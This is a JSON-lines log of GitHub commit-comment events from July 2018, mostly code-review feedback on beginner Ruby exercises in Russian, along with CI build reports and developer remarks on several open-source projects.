{"id":"7985748995","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29756526,"position":45,"line":45,"path":"lesson1/pifagor_1.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-18T22:09:37Z","updated_at":"2018-07-18T22:09:37Z","author_association":"NONE","body":"тут не надо разносить на 2 строки, лучше оставить в одной"}},"created_at":"2018-07-18T22:09:37Z"}
{"id":"7985750192","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756532,"position":7,"line":7,"path":"lesson1/tri_area.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:09:57Z","updated_at":"2018-07-18T22:09:57Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-18T22:09:57Z"}
{"id":"7985750513","type":"CommitCommentEvent","actor":{"login":"vladimirblokhin"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756534,"position":17,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:10:03Z","updated_at":"2018-07-18T22:10:03Z","author_association":"OWNER","body":"Причем у нас в условии задачи четко указано, что выводить значение дискриминанта надо в любом случае"}},"created_at":"2018-07-18T22:10:03Z"}
{"id":"7985750736","type":"CommitCommentEvent","actor":{"login":"aakashrajput"},"repo":{"name":"edjustice/edjustice.github.io"},"payload":{"comment":{"id":29756535,"position":4,"line":197,"path":"gallery.html","commit_id":"747e782502eb998da435df09d67783e7b3d40de3","created_at":"2018-07-18T22:10:07Z","updated_at":"2018-07-18T22:10:07Z","author_association":"COLLABORATOR","body":"kuch gadbad hai yaha"}},"created_at":"2018-07-18T22:10:07Z"}
{"id":"7985750875","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756536,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T22:10:09Z","updated_at":"2018-07-18T22:10:09Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2324 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-18T22:10:09Z"}
{"id":"7985751196","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29756538,"position":47,"line":47,"path":"lesson1/pifagor_1.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-18T22:10:14Z","updated_at":"2018-07-18T22:10:14Z","author_association":"NONE","body":"все хорошо, только не понятно, почему треугольник со сторонами\r\n0.3, 0.4, 0.5 некорректный\r\n\r\n"}},"created_at":"2018-07-18T22:10:14Z"}
{"id":"7985751534","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree"},"payload":{"comment":{"id":29756539,"position":null,"line":null,"path":null,"commit_id":"3b3fe0d8a5629157eef951d3d9ab47c86229b5a6","created_at":"2018-07-18T22:10:19Z","updated_at":"2018-07-18T22:10:19Z","author_association":"MEMBER","body":"Yeah, I like to keep a pretty detailed changelog for vshaxe too, just haven't gotten into the habit of it here for some reason."}},"created_at":"2018-07-18T22:10:19Z"}
{"id":"7985751886","type":"CommitCommentEvent","actor":{"login":"jakapoor"},"repo":{"name":"jakapoor/AMRUPT"},"payload":{"comment":{"id":29756540,"position":null,"line":null,"path":null,"commit_id":"43f666a45d942e8d956cb7e4137796f64671b371","created_at":"2018-07-18T22:10:24Z","updated_at":"2018-07-18T22:10:24Z","author_association":"OWNER","body":"Commit rolled back, since it was placed in the wrong location"}},"created_at":"2018-07-18T22:10:24Z"}
{"id":"7985752883","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29756543,"position":27,"line":27,"path":"lesson1/quadratic_1.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-18T22:10:39Z","updated_at":"2018-07-18T22:10:39Z","author_association":"NONE","body":"коэффициенты могут быть не целыми"}},"created_at":"2018-07-18T22:10:39Z"}
{"id":"7985753232","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756544,"position":6,"line":6,"path":"lesson1/tri_area.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:10:44Z","updated_at":"2018-07-18T22:10:44Z","author_association":"NONE","body":"приведение полученного значения к числу лучше делать в момент получения, а не в момент использования"}},"created_at":"2018-07-18T22:10:44Z"}
{"id":"7985755612","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29756549,"position":43,"line":43,"path":"lesson1/quadratic_1.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-18T22:11:24Z","updated_at":"2018-07-18T22:11:24Z","author_association":"NONE","body":"неверная формула)\r\nа где вычисление корня из дискриминанта? "}},"created_at":"2018-07-18T22:11:24Z"}
{"id":"7985756332","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756551,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T22:11:35Z","updated_at":"2018-07-18T22:11:35Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T22:11:35Z"}
{"id":"7985757610","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756555,"position":3,"line":3,"path":"lesson1/tri_area.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:11:55Z","updated_at":"2018-07-18T22:11:55Z","author_association":"NONE","body":"Нужно давать методам и переменным говорящие имена. Тогда читать код будет легче. Тут например может быть base а дальше height"}},"created_at":"2018-07-18T22:11:55Z"}
{"id":"7985759048","type":"CommitCommentEvent","actor":{"login":"arobase-che"},"repo":{"name":"syntax-tree/hast-util-raw"},"payload":{"comment":{"id":29756556,"position":8,"line":34,"path":"package.json","commit_id":"e390a5f92667877ebeac8d855d93ac02f736c1a2","created_at":"2018-07-18T22:12:18Z","updated_at":"2018-07-18T22:12:18Z","author_association":"CONTRIBUTOR","body":"Oups, that line still :crying_cat_face: "}},"created_at":"2018-07-18T22:12:18Z"}
{"id":"7985760489","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29756559,"position":21,"line":21,"path":"lesson1/triangle_area.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-18T22:12:42Z","updated_at":"2018-07-18T22:12:42Z","author_association":"NONE","body":"а) стороны могут быть целыми и меньше 1\r\nб) зачем делать сначала to_i, и потом to_f\r\nв) лучше умножить на 0.5 чем делить на 2"}},"created_at":"2018-07-18T22:12:42Z"}
{"id":"7985760599","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29756560,"position":4,"line":233,"path":"python/py-graveyard/Portfile","commit_id":"be83b67a0fa270989f2ac4d862aefa3d6f411c89","created_at":"2018-07-18T22:12:43Z","updated_at":"2018-07-18T22:12:43Z","author_association":"MEMBER","body":"Aren't those not merely old but actually obsolete? That is, we no longer support them?"}},"created_at":"2018-07-18T22:12:43Z"}
{"id":"7985761916","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29756563,"position":null,"line":null,"path":null,"commit_id":"df021a14852af068c2f5dedcb63ff895221abb53","created_at":"2018-07-18T22:13:07Z","updated_at":"2018-07-18T22:13:07Z","author_association":"CONTRIBUTOR","body":"This commit implements right-sided stems for half notes, related to issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/134 for the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n```\r\n**kern\r\n=1\r\n2dd\r\n=2\r\n*2\\right\r\n2ee\r\n=3\r\n*2\\left\r\n2ff\r\n==\r\n*-\r\n```\r\n\r\nThe `*2\\right` forces stems to the right side of noteheads when the note is a half note and the stem is down.  The tandem interpretation `*2\\left` cancels the styling of the half notes and reverts to the modern convention.\r\n\r\nconversion to MEI:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-18T17:39:50\" version=\"2.0.0-dev-9b4f756\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000544542068\">\r\n                <score xml:id=\"score-0000001690717009\">\r\n                    <scoreDef xml:id=\"scoredef-0000000366741394\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001074873718\">\r\n                            <staffDef xml:id=\"staffdef-0000001588901016\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001751721492\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L2\" n=\"1\">\r\n                            <staff xml:id=\"staff-L2F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L2F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F1\" dur=\"2\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L4\" n=\"2\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F1\" dur=\"2\" oct=\"5\" pname=\"e\" stem.pos=\"right\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L7\" right=\"end\" n=\"3\">\r\n                            <staff xml:id=\"staff-L7F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L7F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F1\" dur=\"2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nVerovio currently does not render `note@stem.pos`, so currently displays as:\r\n\r\n<img width=\"508\" alt=\"screen shot 2018-07-18 at 11 49 23 pm\" src=\"https://user-images.githubusercontent.com/3487289/42910473-fecff0e8-8ae7-11e8-91ee-a0f235fbb6f6.png\">\r\n\r\nWhen implemented, the rendering should look like this (with the nothead mirrored as well as the stem on the right):\r\n\r\n<img width=\"508\" alt=\"reversed\" src=\"https://user-images.githubusercontent.com/3487289/42910530-3961ce5c-8ae8-11e8-95d7-5e81412c9a0f.png\">\r\n\r\n"}},"created_at":"2018-07-18T22:13:07Z"}
{"id":"7985762641","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756564,"position":6,"line":6,"path":"lesson1/tri_area.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:13:19Z","updated_at":"2018-07-18T22:13:19Z","author_association":"NONE","body":"здесь и далее:\r\n\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```\r\n\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-18T22:13:19Z"}
{"id":"7985766187","type":"CommitCommentEvent","actor":{"login":"nyurik"},"repo":{"name":"elastic/ems-landing-page"},"payload":{"comment":{"id":29756570,"position":null,"line":null,"path":null,"commit_id":"c8ea133995f143f154564aa2479b77e4224c836f","created_at":"2018-07-18T22:14:16Z","updated_at":"2018-07-18T22:14:16Z","author_association":"CONTRIBUTOR","body":"I would recommend using staging as the default, and the production script could set some env var to indicate that it is for production. Unless I don't understanding what the `default` here does?"}},"created_at":"2018-07-18T22:14:16Z"}
{"id":"7985766335","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/tokentree"},"payload":{"comment":{"id":29756571,"position":null,"line":null,"path":null,"commit_id":"3b3fe0d8a5629157eef951d3d9ab47c86229b5a6","created_at":"2018-07-18T22:14:19Z","updated_at":"2018-07-18T22:14:19Z","author_association":"MEMBER","body":"no problem, I just copied it together from github's emails, so it wasn't too much work"}},"created_at":"2018-07-18T22:14:19Z"}
{"id":"7985768510","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756574,"position":13,"line":13,"path":"lesson1/triangle.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:14:55Z","updated_at":"2018-07-18T22:14:55Z","author_association":"NONE","body":"Настрой редактор на отступ ровно в 2 пробела, именно так принято в ruby. Причем, именно пробела, а не таба. Т.е. должна быть замена табов на пробелы, т.н. soft tabs. Найди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-18T22:14:55Z"}
{"id":"7985769140","type":"CommitCommentEvent","actor":{"login":"vladimirblokhin"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756577,"position":49,"line":16,"path":"Lesson_1/r_triangle.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:15:05Z","updated_at":"2018-07-18T22:15:05Z","author_association":"OWNER","body":"@VladFiliucov  А какая разница? В проверке на равнобедренность и равносторонность сортировка не имеет значения.\r\nВ реализации теоремы Пифагора я именно так и получаю элементы."}},"created_at":"2018-07-18T22:15:05Z"}
{"id":"7985769576","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29756579,"position":6,"line":231,"path":"Tests/makeotf_test.py","commit_id":"8f307b9021c27c314bedd81365eddc20e774c421","created_at":"2018-07-18T22:15:12Z","updated_at":"2018-07-18T22:15:12Z","author_association":"MEMBER","body":"This is not how you test for the occurrence of errors. Please look at other test examples"}},"created_at":"2018-07-18T22:15:12Z"}
{"id":"7985769613","type":"CommitCommentEvent","actor":{"login":"PaperSlips"},"repo":{"name":"PaperSlips/GraphicsImplementation"},"payload":{"comment":{"id":29756580,"position":null,"line":null,"path":null,"commit_id":"ca6cabba3503ef6fb05a322c65cdf44171215c01","created_at":"2018-07-18T22:15:13Z","updated_at":"2018-07-18T22:15:13Z","author_association":"OWNER","body":"Issue ended up being glew not initialized.\r\nReason:\r\n```cpp\r\nSomeObjectType c;\r\n```\r\nCalls default constructor."}},"created_at":"2018-07-18T22:15:13Z"}
{"id":"7985769948","type":"CommitCommentEvent","actor":{"login":"julesghub"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756583,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:15:18Z","updated_at":"2018-07-18T22:15:18Z","author_association":"CONTRIBUTOR","body":"Yep, nice one. Now to put the fn on the c-object. "}},"created_at":"2018-07-18T22:15:18Z"}
{"id":"7985771340","type":"CommitCommentEvent","actor":{"login":"kerastinell"},"repo":{"name":"kerastinell/Derpibooru"},"payload":{"comment":{"id":29756587,"position":null,"line":null,"path":null,"commit_id":"5bc588ea54f9e93cf1b34ceef8f44bd2d2d75f64","created_at":"2018-07-18T22:15:40Z","updated_at":"2018-07-18T22:15:40Z","author_association":"OWNER","body":"Derpibooru's API has changed, the old code was displaying 1 spoiled and hidden tag for any filter in the list.\r\n![device-2018-07-19-002553](https://user-images.githubusercontent.com/23572628/42910687-2a6c470c-8af1-11e8-8595-3b1bdac29420.png)\r\n\r\nLooks fine after fixing.\r\n![device-2018-07-19-002841](https://user-images.githubusercontent.com/23572628/42910697-348326e8-8af1-11e8-934f-37c332e6bf16.png)\r\n\r\n"}},"created_at":"2018-07-18T22:15:40Z"}
{"id":"7985772381","type":"CommitCommentEvent","actor":{"login":"PaperSlips"},"repo":{"name":"PaperSlips/GraphicsImplementation"},"payload":{"comment":{"id":29756593,"position":null,"line":null,"path":null,"commit_id":"a16ba6a98d5d4bf7366b219f002cd0380306f636","created_at":"2018-07-18T22:15:57Z","updated_at":"2018-07-18T22:15:57Z","author_association":"OWNER","body":"Reason for this is sizeof only returns pointer size when new keyword is involved."}},"created_at":"2018-07-18T22:15:57Z"}
{"id":"7985774045","type":"CommitCommentEvent","actor":{"login":"jmansour"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756595,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:16:22Z","updated_at":"2018-07-18T22:16:22Z","author_association":"CONTRIBUTOR","body":"That should be happening at line 199 right? "}},"created_at":"2018-07-18T22:16:22Z"}
{"id":"7985774166","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756596,"position":13,"line":13,"path":"lesson1/triangle.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:16:24Z","updated_at":"2018-07-18T22:16:24Z","author_association":"NONE","body":"then тут не нужен. then используется иногда в case выражениях, и то крайне редко."}},"created_at":"2018-07-18T22:16:24Z"}
{"id":"7985774187","type":"CommitCommentEvent","actor":{"login":"rbeucher"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756597,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:16:25Z","updated_at":"2018-07-18T22:16:25Z","author_association":"CONTRIBUTOR","body":"What?"}},"created_at":"2018-07-18T22:16:25Z"}
{"id":"7985775525","type":"CommitCommentEvent","actor":{"login":"PaperSlips"},"repo":{"name":"PaperSlips/GraphicsImplementation"},"payload":{"comment":{"id":29756604,"position":null,"line":null,"path":null,"commit_id":"19a90b7c7d2ecdfffcfd65f77bf60233319e5f69","created_at":"2018-07-18T22:16:46Z","updated_at":"2018-07-18T22:16:46Z","author_association":"OWNER","body":"Makes more sense in the long-term, since models will be loaded dynamically, not const initialized."}},"created_at":"2018-07-18T22:16:46Z"}
{"id":"7985776034","type":"CommitCommentEvent","actor":{"login":"LeeHowes"},"repo":{"name":"LeeHowes/pushmi"},"payload":{"comment":{"id":29756605,"position":57,"line":201,"path":"include/pushmi/o/async.h","commit_id":"a237a5558345e1f8fda2ceb55e3352a834784abe","created_at":"2018-07-18T22:16:54Z","updated_at":"2018-07-18T22:16:54Z","author_association":"OWNER","body":"Ah, yes. Look at the head of tree in the PR. I added customisation points that separate this and make it depend on the executor."}},"created_at":"2018-07-18T22:16:54Z"}
{"id":"7985777581","type":"CommitCommentEvent","actor":{"login":"PaperSlips"},"repo":{"name":"PaperSlips/GraphicsImplementation"},"payload":{"comment":{"id":29756610,"position":null,"line":null,"path":null,"commit_id":"7d100ed1e7d61e8a10898a27cd24cec59b72ac09","created_at":"2018-07-18T22:17:17Z","updated_at":"2018-07-18T22:17:17Z","author_association":"OWNER","body":"Turns out, not exactly. Use new keyword if you run into this."}},"created_at":"2018-07-18T22:17:17Z"}
{"id":"7985778149","type":"CommitCommentEvent","actor":{"login":"derek-pryor"},"repo":{"name":"jhuapl-boss/boss-tools"},"payload":{"comment":{"id":29756611,"position":5,"line":38,"path":"bossutils/vault.py","commit_id":"070f94a2d667dca58c8bd50c9ec3377e5a23068f","created_at":"2018-07-18T22:17:26Z","updated_at":"2018-07-18T22:17:26Z","author_association":"CONTRIBUTOR","body":"You either need to qualify the class reference or import the class from `hvac`"}},"created_at":"2018-07-18T22:17:26Z"}
{"id":"7985778285","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29756613,"position":null,"line":null,"path":null,"commit_id":"170e2c46134cb27e47b6e691a998a093e47c90ae","created_at":"2018-07-18T22:17:28Z","updated_at":"2018-07-18T22:17:28Z","author_association":"OWNER","body":"Also added fog of war to dungeons"}},"created_at":"2018-07-18T22:17:28Z"}
{"id":"7985778582","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"hoshsadiq/adblock-nocoin-list"},"payload":{"comment":{"id":29756614,"position":6,"line":260,"path":"nocoin.txt","commit_id":"d4d06d301eac48ab13bce744b59819b3907dd4ee","created_at":"2018-07-18T22:17:33Z","updated_at":"2018-07-18T22:17:33Z","author_association":"CONTRIBUTOR","body":"> I thought important gave it priority. \r\n\r\nYes for ublock (ONLY) and will be ignored by other adblockers."}},"created_at":"2018-07-18T22:17:33Z"}
{"id":"7985778883","type":"CommitCommentEvent","actor":{"login":"rbeucher"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756618,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:17:38Z","updated_at":"2018-07-18T22:17:38Z","author_association":"CONTRIBUTOR","body":"Yes I have tested it. Now what I don't understand is why I need line 200..."}},"created_at":"2018-07-18T22:17:38Z"}
{"id":"7985779165","type":"CommitCommentEvent","actor":{"login":"Ramon-Arroyo-Sublimonchis"},"repo":{"name":"Ramon-Arroyo-Sublimonchis/udemy-heroes"},"payload":{"comment":{"id":29756619,"position":4,"line":4,"path":"villanos.md","commit_id":"df6ed627c77589d624e2fb0d12ce29e04d137bb7","created_at":"2018-07-18T22:17:43Z","updated_at":"2018-07-18T22:17:43Z","author_association":"OWNER","body":"Este villano quien es?"}},"created_at":"2018-07-18T22:17:43Z"}
{"id":"7985780077","type":"CommitCommentEvent","actor":{"login":"PaperSlips"},"repo":{"name":"PaperSlips/GraphicsImplementation"},"payload":{"comment":{"id":29756621,"position":null,"line":null,"path":null,"commit_id":"9f0ada5ef6d537b7493ebf5ec89d818b71598eb7","created_at":"2018-07-18T22:17:58Z","updated_at":"2018-07-18T22:17:58Z","author_association":"OWNER","body":"Static variables must be initialized, apparently."}},"created_at":"2018-07-18T22:17:58Z"}
{"id":"7985780757","type":"CommitCommentEvent","actor":{"login":"LeeHowes"},"repo":{"name":"LeeHowes/pushmi"},"payload":{"comment":{"id":29756623,"position":69,"line":213,"path":"include/pushmi/o/async.h","commit_id":"a237a5558345e1f8fda2ceb55e3352a834784abe","created_at":"2018-07-18T22:18:09Z","updated_at":"2018-07-18T22:18:09Z","author_association":"OWNER","body":"I think that's right isn't it? If this was GPU code we'd be running the bulk task directly here in whatever context we know how to create for the executor. It's just that this earlier version of the change assumes that we are always doing this thread executor because it predates the customisation points."}},"created_at":"2018-07-18T22:18:09Z"}
{"id":"7985781577","type":"CommitCommentEvent","actor":{"login":"Ramon-Arroyo-Sublimonchis"},"repo":{"name":"Ramon-Arroyo-Sublimonchis/udemy-heroes"},"payload":{"comment":{"id":29756626,"position":null,"line":null,"path":null,"commit_id":"df6ed627c77589d624e2fb0d12ce29e04d137bb7","created_at":"2018-07-18T22:18:22Z","updated_at":"2018-07-18T22:18:22Z","author_association":"OWNER","body":"Entiendo por que agregaste a Lex 💯 "}},"created_at":"2018-07-18T22:18:22Z"}
{"id":"7985781967","type":"CommitCommentEvent","actor":{"login":"rbeucher"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29756629,"position":null,"line":null,"path":null,"commit_id":"c1bd01df5b4115a4e95c4a367be1d1da40d6954b","created_at":"2018-07-18T22:18:29Z","updated_at":"2018-07-18T22:18:29Z","author_association":"CONTRIBUTOR","body":"Forget about last comment I am getting confused\r\n"}},"created_at":"2018-07-18T22:18:29Z"}
{"id":"7985783550","type":"CommitCommentEvent","actor":{"login":"kerastinell"},"repo":{"name":"kerastinell/Derpibooru"},"payload":{"comment":{"id":29756633,"position":null,"line":null,"path":null,"commit_id":"77be73032bac381947d8151d33417954438ce214","created_at":"2018-07-18T22:18:57Z","updated_at":"2018-07-18T22:18:57Z","author_association":"OWNER","body":"The first parameter is now unnecessary, it was making filter applying impossible."}},"created_at":"2018-07-18T22:18:57Z"}
{"id":"7985783998","type":"CommitCommentEvent","actor":{"login":"minershive"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29756637,"position":null,"line":null,"path":null,"commit_id":"82ccb0fce8d01d0a95641aa945ee969c2ffc9e9a","created_at":"2018-07-18T22:19:06Z","updated_at":"2018-07-18T22:19:06Z","author_association":"OWNER","body":"you can user previous images\r\nplease check versions here\r\nhttp://download.hiveos.farm/VERSIONS.txt"}},"created_at":"2018-07-18T22:19:06Z"}
{"id":"7985784544","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29756638,"position":23,"line":23,"path":"route.rb","commit_id":"381a6f49d6f61433349472053d28503bbce1cfb0","created_at":"2018-07-18T22:19:15Z","updated_at":"2018-07-18T22:19:15Z","author_association":"NONE","body":"тут явно баг метод terminal_station, а пишем в @starting_station"}},"created_at":"2018-07-18T22:19:15Z"}
{"id":"7985786093","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756639,"position":20,"line":20,"path":"lesson1/triangle.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:19:44Z","updated_at":"2018-07-18T22:19:44Z","author_association":"NONE","body":"Эти две операции стоит объединить в одну.\r\n```\r\nsides = [a, b, c].sort!\r\n```\r\nТогда последняя строна будет самой длинной. Дальше можно будет обратиться к эллементам массива так.\r\n```\r\n# первый элемент в массиве\r\nsides[0]\r\n# третий элемент массива\r\nsides[2]\r\n```"}},"created_at":"2018-07-18T22:19:44Z"}
